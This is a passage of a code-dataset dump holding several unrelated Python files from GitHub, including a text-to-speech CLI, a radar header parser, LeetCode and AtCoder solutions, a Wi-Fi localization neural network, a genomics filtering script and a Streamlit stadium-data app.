news\", action=\"store_const\", dest=\"category\", const=\"gear\")\ngroup2.add_argument(\"--business\", help=\"Read the latest business news\", action=\"store_const\", dest=\"category\", const=\"business\")\ngroup2.add_argument(\"--culture\", help=\"Read the latest culture news\", action=\"store_const\", dest=\"category\", const=\"culture\")\ngroup2.add_argument(\"--science\", help=\"Read the latest science news\", action=\"store_const\", dest=\"category\", const=\"science\")\ngroup2.add_argument(\"--security\", help=\"Read the latest security news\", action=\"store_const\", dest=\"category\", const=\"security\")\n\nparser.add_argument(\"-o\", \"--output\", help=\"May be used --audio/-a only. The name of the audio file to be created. If not specified, defaults to output.wav\", dest=\"output\", required=False)\n\nargs = parser.parse_args()\n\napi_key = os.environ.get(\"ELEVENLABS_API_KEY\")\n\nif api_key is None:\n print(\"Error: API_KEY environment variable not set\")\n sys.exit(1)\n\nvoice_id = args.voice_id or \"EXAVITQu4vr4xnSDxMaL\"\nendpoint = args.endpoint\n\nif args.get_voices:\n get_voices(api_key)\nelse:\n voice_id = args.voice_id or \"EXAVITQu4vr4xnSDxMaL\"\n endpoint = args.endpoint\n\nif args.category:\n text = get_news_by_category(args.category)\nelif args.text:\n text = args.text\nelif args.file:\n with open(args.file, \"r\") as f:\n text = f.read()\nelif args.url:\n text = url_to_text(args.url)\nelse:\n text = \"This is an example text to speech conversion.\"\n\ntry:\n if not args.get_voices:\n if args.endpoint == \"stream\":\n if args.output:\n raise Exception(\"Error: -s and -o cannot be used together\")\n audio_file_name = None\n elif args.endpoint == \"audio\":\n audio_file_name = args.output if args.output else \"output.wav\"\n else:\n audio_file_name = None\n\n play_audio(voice_id, api_key, text, endpoint, audio_file_name)\n\nexcept Exception as e:\n print(e)\n sys.exit(1)\n\nexcept KeyboardInterrupt:\n print(\"\\nExiting the program...\")\n sys.exit(0)\n","repo_name":"piercecohen1/AI-TTS","sub_path":"TTS.py","file_name":"TTS.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"25666362615","text":"import numpy as np\nimport lib.utils as ut\nimport time\n\n\nclass HSIDataCardHeader:\n def __init__(self, buffer):\n self.buffer = buffer\n while buffer.n_elems < 32:\n time.sleep(0.01)\n # ut.precise_sleep(0.01)\n # time.sleep(0.001)\n data = buffer.read(16, update=True)\n # total length = 16 B\n self.id = (bytes(data[:2])+bytes(data[4:6])+bytes(data[2:4])+bytes(data[6:8])).hex()\n # print('id:', self.id)\n\n totalLengthLSW = data[8:10]\n totalLengthLSW.dtype = 'H'\n totalLengthMSW = data[12:14]\n totalLengthMSW.dtype = 'H'\n totalLength = totalLengthMSW * 2**12 + totalLengthLSW\n self.totalLength = totalLength[0]\n\n\nclass HSISDKHeader:\n def __init__(self, datacard_header):\n while datacard_header.buffer.n_elems < datacard_header.totalLength+16:\n ut.precise_sleep(0.001)\n #time.sleep(0.001)\n data = datacard_header.buffer.read(datacard_header.totalLength, update=True)\n version_high = data[1]\n version_low = data[0]\n major = (version_high & 0b1110) >> 1\n minor = ((version_high & 0b1) << 2) | ((version_low & 0b11000000) >> 6)\n bugfix = (version_low & 0b111000) >> 3\n build = version_low & 0b111\n\n self.version = '{}.{}.{}.{}'.format(major, minor, bugfix, build)\n\n header_size = data[4:6]\n header_size.dtype = 'H'\n self.header_size = header_size[0]\n # print('header size: {}B'.format(self.header_size))\n\n platform = data[2]\n self.platform = 'XWR14XX' if platform == 1 else \\\n 'XWR16XX' if platform == 2 else \\\n 'XWR18XX' if platform == 3 else \\\n 'XWR68XX'if platform == 4 else None\n\n self.interleaved = True if data[3] == 1 else False if data[3] == 2 else None\n\n dataSize = data[6]\n dataType = data[7]\n\n self.dataSize = 16 if dataSize == 0 else 14 if dataSize == 1 else 12 if dataSize == 2 else None\n self.dataType = 'Cplx' if dataType == 2 else 'Real' if dataType == 1 else None\n # print('dsize: {} b, dtype: {}, interleaved: {}'.format(self.dataSize, self.dataType, self.interleaved))\n\n self.rxChannelStatus = bin(data[8])\n # print('rxchan', self.rxChannelStatus)\n dataFmt = data[9]\n self.dataFmt = 'ADC' if dataFmt == 1 \\\n else 'HW stream disable' if dataFmt == 0 \\\n else 'CP + ADC + CQ' if dataFmt == 4 \\\n else None\n # print('dformat:', self.dataFmt)\n\n chirpMode = data[12:14]\n chirpMode.dtype = 'H'\n self.chirpMode = 'Single chirp' if chirpMode == 1 else 'Multi chirp' if 2 <= chirpMode <= 8 else None\n # print('chirp mode:', self.chirpMode)\n\n adcDataSize = data[10:12]\n adcDataSize.dtype = 'H'\n self.adcDataSize = adcDataSize[0]\n # print('adc data size', adcDataSize[0])\n\n cpDataSize = data[14:16]\n cpDataSize.dtype = 'H'\n self.cpDataSize = cpDataSize[0]\n # print('cp data size', self.cpDataSize)\n\n cqDataSize0 = data[16:18]\n cqDataSize0.dtype = 'H'\n\n cqDataSize1 = data[[20, 22]]\n cqDataSize1.dtype = 'H'\n\n cqDataSize2 = data[18:20]\n cqDataSize2.dtype = 'H'\n\n usrBufSize0 = data[22:24]\n usrBufSize0.dtype = 'H'\n\n usrBufSize1 = data[[24, 26]]\n usrBufSize1.dtype = 'H'\n\n usrBufSize2 = data[28:30]\n usrBufSize2.dtype = 'H'\n\n self.appExtHeader = np.concatenate((data[26:28], data[30:34], data[36:38]))\n\n inquiry = data[46:48]\n k = 0\n while all(inquiry == [15, 15]):\n k += 2\n inquiry = data[46+k: 48+k]\n\n if k == 4 and datacard_header.id == 'dc0ada0cdc0ada0c':\n k = 2\n print('strange event')\n print(k, self.header_size, usrBufSize0, usrBufSize1, usrBufSize2, datacard_header.totalLength)\n\n self.data = data[46+k:]\n self.data.dtype = 'h'\n\n if datacard_header.id == 'dc0ada0cdc0ada0c':\n self.data = self.data.reshape((4, -1), order='F')\n raw_i = self.data[:2, :].flatten(order='F')\n raw_q = self.data[2:, :].flatten(order='F')\n raw_i_ok = raw_i.reshape((-1, 4), order='F')\n raw_q_ok = raw_q.reshape((-1, 4), order='F')\n self.data = raw_i_ok + 1j * raw_q_ok\n","repo_name":"potassacaustica/civil_engineer","sub_path":"iwr1843/hdr/iwr1843_hdr.py","file_name":"iwr1843_hdr.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775039671","text":"'''\n847. Shortest Path Visiting All Nodes\nHard\n\n2240\n\n117\n\nAdd to List\n\nShare\nYou have an undirected, connected graph of n nodes labeled from 0 to n - 1. You are given an array graph where graph[i] is a list of all the nodes connected with node i by an edge.\n\nReturn the length of the shortest path that visits every node. You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.\n\n \n\nExample 1:\n\n\nInput: graph = [[1,2,3],[0],[0],[0]]\nOutput: 4\nExplanation: One possible path is [1,0,2,0,3]\nExample 2:\n\n\nInput: graph = [[1],[0,2,4],[1,3,4],[2],[1,2]]\nOutput: 4\nExplanation: One possible path is [0,1,4,2,3]\n \n\nConstraints:\n\nn == graph.length\n1 <= n <= 12\n0 <= graph[i].length < n\ngraph[i] does not contain i.\nIf graph[a] contains b, then graph[b] contains a.\nThe input graph is always connected.\nAccepted\n52,092\nSubmissions\n85,570\n'''\n#dfs\nclass Solution:\n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n def dp(node, mask):\n state = (node, mask)\n if state in cache: return cache[state]\n if mask & (mask-1) == 0: return 0\n cache[state] = float(\"inf\")\n for neighbor in graph[node]:\n if mask & (1< int:\n n = len(graph)\n if n == 1: return 0\n ending_mask = (1< 0:\n if n & 1:\n res = res * x % MOD\n x = x * x % MOD\n n >>= 1\n return res\n\n\ndef inv(x):\n return mod_pow(x, MOD - 2)\n\n\ndef init():\n global P, Q\n P[0] = 1\n for i in range(1, N + 1):\n P[i] = P[i - 1] * i % MOD\n Q[N] = inv(P[N])\n for i in range(N, 0, -1):\n Q[i - 1] = Q[i] * i % MOD\n\n\ndef mod_com(n, k):\n if k < 0 or n < 0 or n < k:\n return 0\n if k == 0:\n return 1\n return P[n] * Q[n - k] % MOD * Q[k] % MOD\n\n\ninit()\nres = 0\nfor i in range(K - 1, N):\n res = (res + mod_com(i, K - 1) * A[i] % MOD) % MOD\nfor i in range(N - K + 1):\n res = (res - mod_com(N - i - 1, K - 1) * A[i] % MOD + MOD) % MOD\nprint(res)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/ABC/151/python/E_Max_Min_Sums.py","file_name":"E_Max_Min_Sums.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23214295811","text":"import numpy as np\nfrom ExtractData import getSamplesAndLabelsFromOneFile, getSamplesAndLabelsFromMultipleFiles, extractData, extractDistinctBSSIDAndNumberOfDataPoints, extractDataFromMultipleFiles\nfrom MatrixManipulation import deterministicSplitMatrix, randomSplitSamplesAndLabels, shuffleMatrices\n\ndef NNOwnDataSet(locations, filename, partOfData, bias, predictsFourthRoom, activationFunction):\n \n trainingSamplesOverall, testSamplesOverall, trainingLabelsOverall, testLabelsOverall = getSamplesAndLabelsFromOneFile(locations, filename, partOfData)\n \n wh, bh, wo, bo, percentageSure, accuracy = bestModelNN(trainingSamplesOverall, trainingLabelsOverall, bias, activationFunction, numberOfClasses=len(locations))\n \n fiveFractile = np.percentile(percentageSure, 5)\n \n if (predictsFourthRoom):\n accuracyFourthRoom, numberOfTestPointsFourthRoom = getAccuracyFourthRoom(locations, filename, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile) \n \n if partOfData == 1: \n if (predictsFourthRoom):\n numberOfTestPoints = int(np.floor(trainingLabelsOverall.shape[0] * 0.2))\n numberOfTestPointsTotal = numberOfTestPoints + numberOfTestPointsFourthRoom\n accuracy = accuracy * numberOfTestPoints / (numberOfTestPointsTotal) + accuracyFourthRoom * numberOfTestPointsFourthRoom / numberOfTestPointsTotal\n \n return accuracy, fiveFractile\n \n predictedLabels, _ = getPredictedLabelsNN(testSamplesOverall, wh, bh, wo, bo, activationFunction, fiveFractile)\n accuracy = testingNN(testLabelsOverall, predictedLabels)\n \n if (predictsFourthRoom):\n numberOfTestPoints = (trainingLabelsOverall.shape[0] - int(np.ceil(trainingLabelsOverall.shape[0] * partOfData))) * 0.2\n numberOfTestPointsTotal = numberOfTestPoints + numberOfTestPointsFourthRoom\n accuracy = accuracy * numberOfTestPoints / (numberOfTestPointsTotal) + accuracyFourthRoom * numberOfTestPointsFourthRoom / numberOfTestPointsTotal\n \n return accuracy, fiveFractile\n \n\ndef NNAgainstOtherDatasets(locations, filename, filenameTests, partOfData, bias, predictsFourthRoom, activationFunction, testNotARoom = False):\n\n trainingSamples, testSamplesOverall, trainingLabels, testLabelsOverall = getSamplesAndLabelsFromMultipleFiles(locations, filename, filenameTests, partOfData, testNotARoom)\n \n wh, bh, wo, bo, percentageSure, _ = bestModelNN(trainingSamples, trainingLabels, bias, activationFunction, numberOfClasses=len(locations))\n \n if (activationFunction == 'sigmoid'):\n fiveFractile = np.percentile(percentageSure, 5)\n else:\n fiveFractile = 1/3+np.finfo(float).eps\n \n predictedLabels, _ = getPredictedLabelsNN(testSamplesOverall, wh, bh, wo, bo, activationFunction, fiveFractile, predictsFourthRoom)\n \n accuracy = testingNN(testLabelsOverall, predictedLabels)\n \n if (predictsFourthRoom):\n accuracyFourthRoom, numberOfTestPointsFourthRoom = getAccuracyFourthRoomTestFile(locations, filename, filenameTests, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile) \n if (partOfData == 1):\n numberOfTestPoints = int(np.floor(testLabelsOverall.shape[0] * 0.2))\n else:\n numberOfTestPoints = (testLabelsOverall.shape[0] - int(np.ceil(testLabelsOverall.shape[0] * partOfData))) * 0.2\n numberOfTestPointsTotal = numberOfTestPoints + numberOfTestPointsFourthRoom\n accuracy = accuracy * numberOfTestPoints / (numberOfTestPointsTotal) + accuracyFourthRoom * numberOfTestPointsFourthRoom / numberOfTestPointsTotal\n \n return accuracy, fiveFractile\n\n\ndef getAccuracyFourthRoom(locations, filename, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile):\n distinctBSSID, _ = extractDistinctBSSIDAndNumberOfDataPoints(locations, filename)\n distinctBSSID, dataPoints = extractDistinctBSSIDAndNumberOfDataPoints([\"___\", \"___\", \"___\", \"___\", \"Entré\"], filename, distinctBSSID)\n samples, labels = extractData([\"___\", \"___\", \"___\", \"___\", \"Entré\"], filename, distinctBSSID, dataPoints)\n\n trainingSamples, _, trainingLabels, _ = randomSplitSamplesAndLabels(samples, labels, partOfData)\n \n predictedLabels, _ = getPredictedLabelsNN(trainingSamples, wh, bh, wo, bo, activationFunction, fiveFractile)\n accuracyFourthRoom = testingNN(trainingLabels, predictedLabels)\n \n numberOfTestPointsFourthRoom = int(np.floor(trainingLabels.shape[0] * 0.2))\n \n return accuracyFourthRoom, numberOfTestPointsFourthRoom\n\ndef getAccuracyFourthRoomTestFile(locations, filename, filenameTests, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile):\n \n distinctBSSID, dataPoints = extractDistinctBSSIDAndNumberOfDataPoints(locations, filename)\n trainingSamples, trainingLabels = extractData(locations, filename, distinctBSSID, dataPoints)\n \n testSamplesOverall, testLabelsOverall = extractDataFromMultipleFiles([\"___\", \"___\", \"___\", \"Intet rum\", \"Entré\"], filenameTests, distinctBSSID)\n \n trainingSamples, _, trainingLabels, _ = randomSplitSamplesAndLabels(testSamplesOverall, testLabelsOverall, partOfData)\n \n predictedLabels, _ = getPredictedLabelsNN(trainingSamples, wh, bh, wo, bo, activationFunction, fiveFractile)\n accuracyFourthRoom = testingNN(trainingLabels, predictedLabels)\n \n numberOfTestPointsFourthRoom = int(np.floor(trainingLabels.shape[0] * 0.2))\n \n return accuracyFourthRoom, numberOfTestPointsFourthRoom\n\ndef bestModelNN(samples, labels, bias, activationFunction, numberOfClasses):\n bestAccuracy = float('-inf')\n bestwh = None\n bestbh = None\n bestwo = None\n bestbo = None\n bestPercentageSure = None\n \n samplesShuffled, labelsShuffled = shuffleMatrices(samples, labels)\n \n for i in range(1,6):\n trainingSamples, testSamples, trainingLabels, testLabels = deterministicSplitMatrix(samplesShuffled, labelsShuffled, 1/5, i)\n wh, bh, wo, bo = trainingModelNN(trainingSamples, trainingLabels, bias, activationFunction, numberOfClasses) \n \n predictedLabels, percentageSure = getPredictedLabelsNN(testSamples, wh, bh, wo, bo, activationFunction)\n accuracy = testingNN(testLabels, predictedLabels)\n \n if accuracy > bestAccuracy:\n bestAccuracy = accuracy\n bestwh = wh\n bestbh = bh\n bestwo = wo\n bestbo = bo\n bestPercentageSure = percentageSure\n \n return bestwh, bestbh, bestwo, bestbo, bestPercentageSure, bestAccuracy\n\n\ndef trainingModelNN(trainingSamples, labelsTrainingSamples, bias, activationFunction, numberOfClasses):\n one_hot_labels = np.zeros((len(labelsTrainingSamples), numberOfClasses))\n \n for i in range(len(labelsTrainingSamples)):\n one_hot_labels[i, labelsTrainingSamples[i].astype(int)] = 1\n\n attributes = trainingSamples.shape[1]\n hidden_nodes = 4\n output_labels = numberOfClasses\n\n np.random.seed(42)\n\n wh = np.random.randn(attributes, hidden_nodes)\n if bias:\n bh = np.random.randn(hidden_nodes)\n else:\n bh = np.zeros(hidden_nodes)\n\n wo = np.random.randn(hidden_nodes, output_labels)\n if bias:\n bo = np.random.randn(output_labels)\n else:\n bo = np.zeros(output_labels)\n\n lr = 0.001\n\n error_cost = []\n wh_list = []\n wo_list = []\n bh_list = []\n bo_list = []\n\n for epoch in range(5000):\n # feedforward\n zh = np.dot(trainingSamples, wh) + bh\n if (activationFunction == 'sigmoid'):\n ah = sigmoid(zh)\n else:\n ah = zh \n zo = np.dot(ah, wo) + bo\n ao = softmax(zo)\n\n # backpropagation\n dcost_dzo = ao - one_hot_labels\n dzo_dwo = ah\n dcost_wo = np.dot(dzo_dwo.T, dcost_dzo)\n\n if (bias):\n dcost_bo = dcost_dzo\n \n dzo_dah = wo\n dcost_dah = np.dot(dcost_dzo , dzo_dah.T)\n dzh_dwh = trainingSamples\n \n if (activationFunction == 'sigmoid'):\n dah_dzh = sigmoid_der(zh)\n dcost_wh = np.dot(dzh_dwh.T, dah_dzh * dcost_dah)\n else:\n dah_dzh = np.ones_like(zh) \n dcost_wh = np.dot(dzh_dwh.T, dah_dzh * dcost_dah)\n \n if (bias):\n dcost_bh = dcost_dah * dah_dzh\n\n # update weights\n wh -= lr * dcost_wh\n wo -= lr * dcost_wo\n if bias:\n bh -= lr * dcost_bh.sum(axis=0)\n bo -= lr * dcost_bo.sum(axis=0)\n\n # store weights\n if epoch % 200 == 0:\n loss = -np.sum(one_hot_labels * np.log(ao))\n error_cost.append(loss)\n wh_list.append(wh.copy())\n wo_list.append(wo.copy())\n bh_list.append(bh.copy())\n bo_list.append(bo.copy())\n\n # select the best weights based on the lowest error cost\n i = np.argmin(error_cost)\n\n return wh_list[i], bh_list[i], wo_list[i], bo_list[i]\n\ndef getPredictedLabelsNN(testSamples, wh, bh, wo, bo, activationFunction, fiveFractile = 0, predictsFourthRoom = False):\n predictedLabels = []\n percentageSure = []\n\n zh = np.dot(testSamples, wh) + bh\n if (activationFunction == \"sigmoid\"):\n ah = sigmoid(zh)\n else:\n ah = zh\n\n z0 = np.dot(ah, wo) + bo\n ah = softmax(z0)\n\n for i in range(len(ah)):\n maxPercentage = np.max(ah[i])\n if (maxPercentage < fiveFractile):\n if (predictsFourthRoom):\n predictedLabels.append(4) #Change to 3 if you want to test not a room\n else: predictedLabels.append(3)\n else:\n predictedLabels.append(np.argmax(ah[i]))\n percentageSure.append(maxPercentage)\n\n return predictedLabels, percentageSure\n \n \ndef softmax(A):\n A -= np.max(A, axis=1, keepdims=True)\n expA = np.exp(A)\n return expA / np.sum(expA, axis=1, keepdims=True)\n\ndef sigmoid(x):\n x = 1/(1+np.exp(-x))\n return x\n \ndef sigmoid_der(x):\n return sigmoid(x) *(1-sigmoid (x))\n\ndef testingNN(labelsTestSamples, predictedLabels):\n correct = 0\n \n for i in range(0, len(labelsTestSamples)):\n if labelsTestSamples[i] == predictedLabels[i]:\n correct += 1\n \n accuracy = correct/len(labelsTestSamples)\n \n return accuracy","repo_name":"moestergaard/DataBehandling","sub_path":"DataAnalysis/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":10281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"90878086","text":"import os\n\nclass item:\n def get_total(self,item_name,rate,qty):\n self.item_name=item_name\n self.rate=rate\n self.qty=qty\n self.total= rate*qty\n \n def display(self):\n print('%20s %20d %20d %20d' %(self.item_name, self.rate, self.qty, self.total))\n return None\n\ndef main():\n item1=item()\n \n print(\"\")\n i_name=input(\"enter item name:--\")\n i_rate=input(\"enter item rate:--\")\n i_qty=input(\"enter item quantity:--\")\n\n print('%20s %20s %20s %20s' %('item_name','rate','qty','total'))\n item1.get_total(i_name,int(i_rate),int(i_qty))\n\n \n item1.display()\n\nif __name__=='__main__':\n main()\n\n","repo_name":"rajesh-priyadarshi/python-scripts","sub_path":"item_by_using_class_with_input.py","file_name":"item_by_using_class_with_input.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38898625767","text":"import json\nimport sys\nfrom dataclasses import dataclass\nfrom itertools import zip_longest\nfrom typing import List\n\nresult_folder_name = sys.argv[1]\n\n\n@dataclass\nclass Tgt:\n name: str\n te_name: str\n chrom: str\n pos: int\n\n\n# list of SX-4 insertions within a natural TE,\n# found through inverse PCR (taken from Google Sheet)\ntargets: List[Tgt] = [\n Tgt(\"SX4Ch7\", \"1360\", \"2L\", 12_004_570),\n Tgt(\"SX4Aq839\", \"1360\", \"2L\", 16_727_570),\n Tgt(\"SX4Lv807\", \"invader1\", \"2R\", 6_622_465),\n Tgt(\"SX4Et51\", \"copia\", \"2R\", 9_237_984),\n Tgt(\"SX4Et8\", \"HMS-Beagle\", \"2R\", 15_951_007),\n Tgt(\"SX4Et49\", \"opus\", \"3L\", 17_918_916),\n Tgt(\"SX4Lv831\", \"Juan\", \"3R\", 4_411_749),\n Tgt(\"SX4Lv816\", \"1360\", \"3R\", 4_610_657),\n Tgt(\"SX4Lv811\", \"F-element\", \"3R\", 4_753_706),\n Tgt(\"SX4Co882\", \"mdg3\", \"3R\", 5_073_316),\n Tgt(\"SX4ECPS11\", \"invader4\", \"3R\", 16_189_617),\n]\n\n# number of bp on each side of the insertion that we allow the transposon to be\ncutoff = 1_000\n\n\n@dataclass\nclass SplitReadRanges:\n te_range: List[int]\n genome_range: List[int]\n\n\n@dataclass\nclass Result:\n ref: bool\n name: str\n chrom: str\n upstream_pos: int\n downstream_pos: int\n orientation: str\n upstream_reads: List[SplitReadRanges]\n downstream_reads: List[SplitReadRanges]\n\n\nwith open(\n f\"output/te_mapper/{result_folder_name}/te_mapper_output.json\", \"r\"\n) as in_file:\n raw = json.load(in_file)\n results = []\n for chrom in raw:\n for result in chrom[\"non_reference\"]:\n results.append(Result(False, **result))\n for result in chrom[\"reference\"]:\n results.append(Result(True, **result))\n for result in results:\n result.upstream_reads = [SplitReadRanges(**x) for x in result.upstream_reads]\n result.downstream_reads = [\n SplitReadRanges(**x) for x in result.downstream_reads\n ]\n\n\ndef candidate(tgt: Tgt, res: Result) -> bool:\n \"\"\"Is the result a candidate to be the target?\"\"\"\n\n # check that it is the same transposon\n if not res.name.startswith(tgt.te_name):\n return False\n\n # check that it is on the same chromosome\n if res.chrom != tgt.chrom:\n return False\n\n # check the position\n if res.ref:\n return tgt.pos in range(res.upstream_pos, res.downstream_pos + 1)\n else:\n return (\n abs(res.upstream_pos - tgt.pos) <= cutoff\n or abs(res.downstream_pos - tgt.pos) <= cutoff\n )\n\n\nfiltered: List[Result] = []\nfor tgt in targets:\n tentative = [result for result in results if candidate(tgt, result)]\n if len(tentative) > 1:\n raise RuntimeError(\n f\"tentative insertion list has more than 1 element (target: {tgt})\"\n )\n elif len(tentative) == 1:\n filtered.append((tgt, tentative[0]))\n\nwith open(\n f\"output/te_mapper/{result_folder_name}/split_reads_for_tgt.csv\", \"w\"\n) as out_file:\n out_file.write(\n \"Name,\"\n \"TE Name,\"\n \"Chromosome,\"\n \"Upstream Position,\"\n \"Downstream Position,\"\n \"Orientation,\"\n \"Reference?,\"\n \"Upstream Reads (TE Range),,\"\n \"Upstream Reads (Genome Range),,\"\n \"Downstream Reads (TE Range),,\"\n \"Downstream Reads (Genome Range),\\n\"\n )\n for tgt, result in filtered:\n out_file.write(\n f\"{tgt.name},\"\n f\"{result.name},\"\n f\"{result.chrom},\"\n f\"{result.upstream_pos},\"\n f\"{result.downstream_pos},\"\n f\"{'+/+' if result.orientation == 'PlusPlus' else '+/-'},\"\n f\"{'reference' if result.ref else 'non-reference'},\"\n \",,,,,,,\\n\"\n )\n results = zip_longest(result.upstream_reads, result.downstream_reads)\n for upstream, downstream in results:\n out_file.write(\",,,,,,,\")\n if upstream is None:\n out_file.write(\",,,,\")\n else:\n out_file.write(\n f\"{upstream.te_range[0]},{upstream.te_range[1]},{upstream.genome_range[0]},{upstream.genome_range[1]},\"\n )\n if downstream is None:\n out_file.write(\",,,\\n\")\n else:\n out_file.write(\n f\"{downstream.te_range[0]},{downstream.te_range[1]},{downstream.genome_range[0]},{downstream.genome_range[1]}\\n\"\n )\n","repo_name":"sanath-2024/stan_x_paper_prep","sub_path":"scripts/get_table1_split_reads.py","file_name":"get_table1_split_reads.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14181899798","text":"import streamlit\r\nimport streamlit as st\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport re\r\n\r\n#Name: Luis Quispe Tasayco\r\n#CS230: Section 3\r\n#Data: stadiums-geocoded\r\n\r\n#Description:\r\n#The program I have created today will demonstrate information about each museum and how they are located and related with their div,\r\n#capacity, state. Also will be able to filter out some stadiums in order to find most convenient stadium to attend.\r\n#(In order for the program to work correctly you must have the data on the pages file and the final project file)\r\ndf = pd.read_csv(\"stadiums-geocoded.csv\") #decided not to add index_col\r\ndef remove_char(string):\r\n return re.sub(r'[^a-zA-Z0-9\\s]', '', string) #searches any string that isnt upper/lower case, number, space and replaces with empty string\r\n\r\n\r\ndf['stadium'] = df['stadium'].apply(remove_char) #apply function\r\ndf['team'] = df['team'].apply(remove_char)\r\n#dictionary w all acronyms\r\nstatesdic = {\r\n \"Alabama\": \"AL\",\r\n \"Alaska\": \"AK\",\r\n \"Arizona\": \"AZ\",\r\n \"Arkansas\": \"AR\",\r\n \"California\": \"CA\",\r\n \"Colorado\": \"CO\",\r\n \"Connecticut\": \"CT\",\r\n \"Delaware\": \"DE\",\r\n \"Florida\": \"FL\",\r\n \"Georgia\": \"GA\",\r\n \"Hawaii\": \"HI\",\r\n \"Idaho\": \"ID\",\r\n \"Illinois\": \"IL\",\r\n \"Indiana\": \"IN\",\r\n \"Iowa\": \"IA\",\r\n \"Kansas\": \"KS\",\r\n \"Kentucky\": \"KY\",\r\n \"Louisiana\": \"LA\",\r\n \"Maine\": \"ME\",\r\n \"Maryland\": \"MD\",\r\n \"Massachusetts\": \"MA\",\r\n \"Michigan\": \"MI\",\r\n \"Minnesota\": \"MN\",\r\n \"Mississippi\": \"MS\",\r\n \"Missouri\": \"MO\",\r\n \"Montana\": \"MT\",\r\n \"Nebraska\": \"NE\",\r\n \"Nevada\": \"NV\",\r\n \"New Hampshire\": \"NH\",\r\n \"New Jersey\": \"NJ\",\r\n \"New Mexico\": \"NM\",\r\n \"New York\": \"NY\",\r\n \"North Carolina\": \"NC\",\r\n \"North Dakota\": \"ND\",\r\n \"Ohio\": \"OH\",\r\n \"Oklahoma\": \"OK\",\r\n \"Oregon\": \"OR\",\r\n \"Pennsylvania\": \"PA\",\r\n \"Rhode Island\": \"RI\",\r\n \"South Carolina\": \"SC\",\r\n \"South Dakota\": \"SD\",\r\n \"Tennessee\": \"TN\",\r\n \"Texas\": \"TX\",\r\n \"Utah\": \"UT\",\r\n \"Vermont\": \"VT\",\r\n \"Virginia\": \"VA\",\r\n \"Washington\": \"WA\",\r\n \"Washington D.C.\": \"DC\",\r\n \"West Virginia\": \"WV\",\r\n \"Wisconsin\": \"WI\",\r\n \"Wyoming\": \"WY\"\r\n}\r\n\r\n#change all states to acronyms, also get D.C. to work\r\ndef state_prob(state):\r\n state = state.strip()\r\n state = state.replace('.','')\r\n if len(state) == 2:\r\n return state\r\n else:\r\n try:\r\n return statesdic[state]\r\n except KeyError:\r\n return 'N/A'\r\ndf['state'] = df['state'].apply(state_prob) #changing states\r\n\r\n#function to get expanded column clear with no issues\r\ndef yearfunc(yr):\r\n if pd.isnull(yr):\r\n return np.nan\r\n elif len(yr) >= 4:\r\n return yr[:4]\r\n else:\r\n return np.nan\r\n\r\ndf['expanded'] = df['expanded'].apply(yearfunc)\r\n\r\n#Finished clearing all errors in data\r\n\r\n#Website section\r\nst.set_page_config(\r\n page_title=\"homepage\"\r\n) #Names the website\r\n\r\nst.title(\"Stadium's data analysis\")\r\nst.subheader(\"CS230.3\")\r\nst.write(\"Welcome to my Data Analysis website, my name is Luis Quispe and the topic of this website is stadiums which we will be able to interact with graphs and maps \")\r\nst.write(\"This website is designed to help you understand better each stadium located in the united states and choose which one can be bigger, smaller, different divs, and conference\")\r\nst.write(\"Any feedback is gladly appreciate it. If you have any, please make sure to leave your feedback on the comment section which I check on a daily baisis and will be able to implement new content or suggestions \")\r\n\r\n\r\nfeedback = st.text_input(\"Please leave feedback here: \")\r\nif st.button(\"Submit Feedback\"):\r\n with open(\"feedback\", \"a\") as f:\r\n f.write(feedback + \"\\n\")\r\n st.write(\"Thank you! I will read it soon\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n#References:\r\n#https://stackoverflow.com/ #just used this link since I used stackoverflow in more than 2 scenarios\r\n#https://gist.github.com/rogerallen/1583593\r\n#https://www.youtube.com/watch?v=YClmpnpszq8\r\n#https://realpython.com/\r\n#Streamlitmap\r\n#https://discuss.streamlit.io/ #Used more than twice\r\n\r\n","repo_name":"luisff112/Stadium-Analytics","sub_path":"Homepage.py","file_name":"Homepage.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12726432345","text":"from django.core.management.base import BaseCommand\nfrom lstv_api_v1.models import *\nfrom alive_progress import alive_bar\n\nfrom lstv_api_v1.tasks.tasks import job_process_ip_to_geo\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n\n forbidden = ['na', 'test',\n 'teaser', 'cinematography', 'loose leaf weddings', 'promo video', 'wedding video may 2020',\n 'highlight reel 2020', '2019 brides', 'milan photo cine art', 'cinematic', '2019 review',\n 'reel0.1', 'wedding video april 2019']\n\n with alive_bar(Video.objects.count(), \"- pruning video browse tab titles for accuracy\", length=10,\n bar=\"blocks\") as bar:\n for video in Video.objects.all():\n venue = video.businesses.filter(business_role_type__slug='venue').values_list('business__name',\n flat=True).first()\n if not venue:\n print(video.post.slug + \" -> \" + \" no venue\")\n video.state = ContentModelState.suspended_review\n video.save()\n\n if not video.location or not video.post.properties.filter(\n key='spouse_1').first() or video.properties.filter(\n key='spouse_2').first():\n if not video.post.properties.filter(key='spouse_1').first() or not video.properties.filter(\n key='spouse_2').first():\n video.state = ContentModelState.suspended_review\n couple = video.title.split('|')[0].split(\"+\")\n if len(couple) == 2 and 